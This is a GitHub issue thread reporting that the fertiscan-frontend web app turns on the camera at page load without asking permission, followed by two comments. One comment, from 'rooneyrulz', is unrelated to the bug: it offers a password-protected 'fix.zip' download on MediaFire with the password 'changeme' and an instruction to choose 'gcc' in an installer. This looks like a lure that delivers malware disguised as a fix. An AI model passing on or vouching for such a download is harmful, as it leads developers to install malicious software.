### ISSUE TITLE
As a user, I want the camera to be enabled when I authorize it.

### ISSUE THREAD

**Issue by snakedye** [ai-cfia/fertiscan-frontend#223]
## Description  

**Bug Summary:** Currently the camera is turned on when the website is loaded which is unsecure.

**Steps to Reproduce:**  
1. Open the webpage.

**Expected Behavior:**  
The should be a popup asking for permission and after the user has given permission, the frontend should start using the camera.

**Actual Behavior:**  
The camera is directly enabled.

**Environment:**  

**Commit Hash:** 99d12986cdbf87f8c9ec0b0a4dcc64cf2eda2edd  

**OS Version:** Fedora 40

**Browser Version:** [e.g., Chrome 91.0.4472.77]  
![Screenshot from 2024-08-29 10-31-22](https://github.com/user-attachments/assets/59679c32-330a-4ce4-9c53-8740bfbe1d46)

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by k-allagbe** [comment]
The camera should also turn off when image selection mode is on.
